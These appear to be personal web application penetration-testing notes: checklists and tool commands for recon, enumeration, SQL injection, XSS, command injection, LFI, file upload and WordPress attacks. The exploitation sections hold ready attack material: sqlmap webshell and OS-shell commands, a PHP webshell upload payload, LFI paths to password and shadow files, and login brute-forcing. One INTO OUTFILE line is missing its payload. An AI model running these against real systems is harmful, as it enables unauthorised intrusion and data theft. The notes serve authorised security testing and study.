Pentest_Notes

🌍 Web Application Penetration Testing

Organized notes for web application penetration testing. Last Updated: 2026-03-27

---

Reconnaissance / Information Gathering

Overview

Web recon involves identifying web servers, their technology stacks, and all accessible endpoints before testing for vulnerabilities.

Checklist — Pre-Authentication

• Disable ad-blockers, cookie plugins, and user-agent switchers in browser
• Find all web servers in scope (scan multiple ports)
• Identify tech stack (whatweb, Wappalyzer, httpx)
• Check website with web-check.as93.net
• Google the exact website title
• Check robots.txt and sitemap.xml
• Check view-source for comments, hidden forms, JS files
• Run directory/file enumeration
• Search for PDFs and document files
• Run vulnerability scanners (Nikto, Nuclei, Burp Suite)
• Enumerate subdomains
• Check for Git repositories (.git/)
• Check network interactions via browser DevTools
• Attempt to identify backend language and framework

Finding Web Servers

# Nmap scan for web services on common ports
nmap -vv -sV -p 80,443,8080,8443,8000,8888,8800,8088,8880,10443,9443 --script http-title --open --min-rate 3000 -T4 <IP>

Tech Stack Identification

# Whatweb
whatweb http://<IP>:<PORT>/

# httpx detailed info
httpx -u http://<IP>:<PORT>/ -td -sc -cl -ct -location -rt -lc -wc -title -server -method -websocket -ip -cname -asn -cdn -probe

# Wappalyzer browser extension — enable and browse the site

Tools

Tool	Purpose	Basic Command
whatweb	Tech stack fingerprint	whatweb http://<IP>
httpx	HTTP probing with details	httpx -u <URL> -td -sc -title
Wappalyzer	Browser-based tech detection	Browser extension
Katana	URL/endpoint discovery	katana -u http://<IP>/
Burp Suite	Web proxy & scanner	GUI-based

---

Enumeration

Directory & File Enumeration

Checklist

• Check robots.txt
• Check sitemap.xml
• Run feroxbuster with medium wordlist
• Run feroxbuster with file extensions relevant to tech stack
• Search for PDF files
• Use Katana for URL discovery
• Collect URLs from Burp Suite sitemap → export → re-fuzz
• Check for backup files (.bak, .old, .zip, .tar.gz)
• Search for hidden files and directories
• Repeat with different wordlists

Feroxbuster

# Basic scan
feroxbuster -u https://<IP>

# Comprehensive scan with extensions
feroxbuster -k -u http://<IP>:<PORT>/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -C 403,404,400,503,301 -x php,html,htm,asp,aspx,jsp,txt,bak,zip,tar.gz,old,inc,conf,config,log,db,json -t 200

# File-focused scan
feroxbuster -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt

# Search for PDFs
feroxbuster -u http://<IP>/ -w $SECLIST/Discovery/Web-Content/raft-large-words.txt -x pdf -q | grep '\.pdf$'

# Using Burp Suite sitemap export as input
cat rest.txt | feroxbuster --stdin -w $SECLIST/Discovery/Web-Content/raft-large-words.txt -E -x txt,php,html,js,json,xml,yaml,tf,sh,bash,py,tmp,lua,pem,pkk -d 2 -m POST,GET

# Lowercase wordlist variant
feroxbuster -u http://<IP> -w $SECLIST/Discovery/Web-Content/raft-large-words-lowercase.txt -x php,bash,sh,txt,bak,backup,sql

💡 Pro Tip: Adjust thread count (-t) based on target stability. Minimum 50, maximum 500. Start with -t 100 and increase if stable.

Gobuster

# Directory enumeration
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30

# File enumeration
gobuster dir -u $URL -w /opt/SecLists/Discovery/Web-Content/raft-medium-files.txt -k -t 30

# Subdomain brute-force
gobuster dns -d domain.org -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30

💡 Pro Tip: “Just make sure any DNS name you find resolves to an in-scope address before you test it.”

Katana

katana -u http://<IP>/

Subdomain Enumeration

# Subfinder + httpx pipeline
echo domain.com | subfinder -silent | httpx -silent -sc -title -td -ip -cname -cl -lc -server -efqdn -fr

---

Vulnerability Assessment

Checklist — Finding Vulnerabilities & Exploits

• Search with searchsploit for identified technologies
• Google for known CVEs
• Use CVEMap for detailed searches
• Search inside Metasploit
• Use Sploitus and Exploit-DB
• Run Nikto, Nuclei, and Burp Suite active scans
• Check for default credentials
• Check for LFI/RFI
• Check for SQL injection
• Check for XSS

Automated Scanning

# Nikto
nikto --host <IP> -p <PORT> -C all
nikto --host <IP> -ssl -evasion 1

# Nuclei
nuclei -u http://<IP>/

# Nmap vulnerability scripts
nmap -p- --script=vuln <IP>

# Nmap HTTP methods
nmap -p80,443 --script=http-methods --script-args http-methods.url-path='/directory/'

Searchsploit

# Update database
searchsploit -u

# Search by CVE
searchsploit --cve CVE-2019-7214

# Search by application name
searchsploit <application_name>

CVEMap

cvemap -p <application_name> -k
cvemap -q "Vendor" -q "Product"

---

Exploitation

Web Application Login Attacks

Checklist

• Try empty username and password fields
• Try username as password
• Search for default credentials
• Brute-force with small username/password lists
• Fuzz for special characters: /usr/share/seclists/Fuzzing/special-chars.txt
• Attempt login bypass (SQLi in login form)
• Brute-force with cewl-generated password list
• Check for account lockout policies
• Analyze error messages for username enumeration
• Check for password reset functionality vulnerabilities

Hydra for Web Login

# HTTP Basic Auth
hydra -L wordlist.txt -P wordlist.txt -u -f <IP> -s <PORT> http-get /

# HTTP POST form
hydra -l admin -P wordlist.txt -f <IP> -s <PORT> http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

SQL Injection (SQLi)

SQLMap Reference

# Basic scan
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

# POST request with injection point
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

# From Burp request file
sqlmap -r req.txt

# PUT method
sqlmap -u www.target.com --data='id=1' --method PUT

# Prefix/suffix
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

# Database enumeration
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

# Table enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

# Dump specific columns
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

# Conditional dump
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

# CSRF token bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=TOKEN" --csrf-token="csrf-token"

# List tamper scripts
sqlmap --list-tampers

# Write webshell
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

# OS shell
sqlmap -u "http://www.example.com/?id=1" --os-shell

# With timing and risk
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
sqlmap -u $URL --threads=2 --time-sec=10 --level=4 --risk=3 --dump

Manual SQL Injection via INTO OUTFILE

SELECT "" into outfile "/var/www/WEROOT/backdoor.php";

Cross-Site Scripting (XSS)

Wfuzz XSS Fuzzing

# XSS fuzzing with BruteLogic payloads
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-BruteLogic.txt "$URL"

# XSS fuzzing with Jhaddix payloads
wfuzz -c -z file,/opt/SecLists/Fuzzing/XSS/XSS-Jhaddix.txt "$URL"

Command Injection

# Wfuzz command injection with POST data
wfuzz -c -z file,/opt/SecLists/Fuzzing/command-injection-commix.txt -d "doi=FUZZ" "$URL"

# Commix with SSL and WAF evasion
commix --url="https://target.com?parameter=" --level=3 --force-ssl --skip-waf --random-agent

Local File Inclusion (LFI) / Remote File Inclusion (RFI)

# PHP filter for base64 encoding (bypass)
php://filter/convert.base64-encode/resource=<FILE>

# Common LFI paths to test
../../../../etc/passwd
../../../../etc/shadow
../../../../var/log/apache2/access.log
../../../../proc/self/environ

PHP Wrappers

php://filter/convert.base64-encode/resource=index.php
php://input
data://text/plain;base64,<BASE64_PAYLOAD>
expect://whoami

File Upload Attacks

# GIF header bypass
GIF89a1
<?php system($_GET['cmd']); ?>

• Try changing extensions: .php, .php5, .phtml, .phar, .phps
• Try double extensions: shell.php.jpg
• Try null byte: shell.php%00.jpg (older PHP)
• Try case changes: .PhP, .pHp
• Change Content-Type to image/jpeg

Parameter Discovery

# Fuzz for parameter names
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt "$URL"

Wfuzz — Authenticated Fuzzing

# Directories (authenticated)
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 -d "SESSIONID=value" "$URL"

# Files (authenticated)
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -d "SESSIONID=value" "$URL"

# Directories
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

# Files
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

# Large words
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL"

# Users
wfuzz -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL"

WordPress Attacks (WPScan)

# Basic enumeration
wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u

# Brute-force
wpscan --url $URL --disable-tls-checks -U users -P /usr/share/wordlists/rockyou.txt

# Aggressive plugin detection
wpscan --url $URL --enumerate p --plugins-detection aggressive

---

Common Pitfalls / Gotchas

• Not checking all ports for web services (8080, 8443, 9000, etc.)
• Forgetting to disable ad-blockers that interfere with testing
• Not trying different HTTP methods (PUT, DELETE, PATCH)
• Missing .git/ directories
• Not crawling the full application before testing
• Overlooking API endpoints
• Not checking for virtual hosts / subdomains

References & Further Reading

• PortSwigger Web Security Academy
• OWASP Testing Guide
• HackTricks - Web Pentesting
• PayloadsAllTheThings